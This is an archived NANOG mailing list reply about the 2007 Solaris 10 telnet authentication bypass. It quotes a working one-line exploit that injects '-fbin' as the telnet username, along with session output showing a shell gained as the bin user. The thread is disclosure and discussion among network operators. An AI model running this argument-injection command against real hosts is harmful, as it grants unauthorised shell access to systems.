nanog mailing list archives
Re: Solaris 10 Telnet Exploit
From: Gadi Evron <ge () linuxbox org>
Date: Sun, 11 Feb 2007 21:47:37 -0600 (CST)
On Sun, 11 Feb 2007, William Schultz wrote:
http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day- disable.html Tested on Sol10, and it indeed works... Good thing we use SSH, right?!
It works. Credit to Johannes Ullrich at the SANS ISC. I believe the vulnerability is that it is running telnet bu default.
################################ iWil:~ wschultz$ telnet -l "-fbin" dns1 Trying A.B.C.D... Connected to dns1.my.com. Escape character is '^]'. Last login: Sun Feb 11 18:11:05 from A.B.C.D Sun Microsystems Inc. SunOS 5.10 Generic January 2005 $ id uid=2(bin) gid=2(bin) $ ################################
Current thread:
- Solaris 10 Telnet Exploit William Schultz (Feb 11)
- Re: Solaris 10 Telnet Exploit Gadi Evron (Feb 11)
- Re: Solaris 10 Telnet Exploit Gadi Evron (Feb 11)
- Solaris telnet vuln solutions digest and network risks Gadi Evron (Feb 13)
- Re: Solaris telnet vuln solutions digest and network risks Albert Meyer (Feb 13)
- Re: Solaris telnet vuln solutions digest and network risks Gadi Evron (Feb 13)
- Re: Solaris telnet vuln solutions digest and network risks Joseph S D Yao (Feb 15)
- Re: Solaris telnet vuln solutions digest and network risks Albert Meyer (Feb 13)